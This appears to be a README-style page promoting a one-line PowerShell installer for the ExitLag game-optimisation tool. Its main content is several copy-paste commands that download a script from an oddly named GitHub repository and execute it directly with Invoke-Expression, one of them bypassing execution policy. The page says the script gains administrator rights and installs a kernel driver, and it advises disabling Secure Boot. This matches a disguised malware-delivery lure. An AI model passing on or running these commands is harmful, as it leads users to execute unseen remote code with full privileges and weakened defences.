One-line installer for ExitLag — reduce ping, fix packet loss, and boost FPS in competitive games.
Open PowerShell and run:
irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iexThat's it. The installer handles everything.
- Elevates to administrator for network driver installation.
- Downloads the ExitLag routing engine and FPS optimizer.
- Installs the WFP callout driver for traffic acceleration.
- Launches the dashboard — select your game and hit Boost.
- Windows 10 / 11 (64-bit)
- PowerShell 5.1+
- Internet connection
- Administrator access
- .NET Framework 4.8+
Ping unchanged after boost
Restart your game — ExitLag hooks the process at launch, not mid-session.
Driver install blocked by Secure Boot
Temporarily disable Secure Boot in BIOS, install, then re-enable.
Dashboard shows 'no routes found'
Check your firewall — ExitLag needs outbound UDP 443 and 8443.
Alternative (bypass execution policy):
powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex""irm is not recognized" — old PowerShell. Use:
Invoke-RestMethod https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | Invoke-ExpressionMIT — see LICENSE.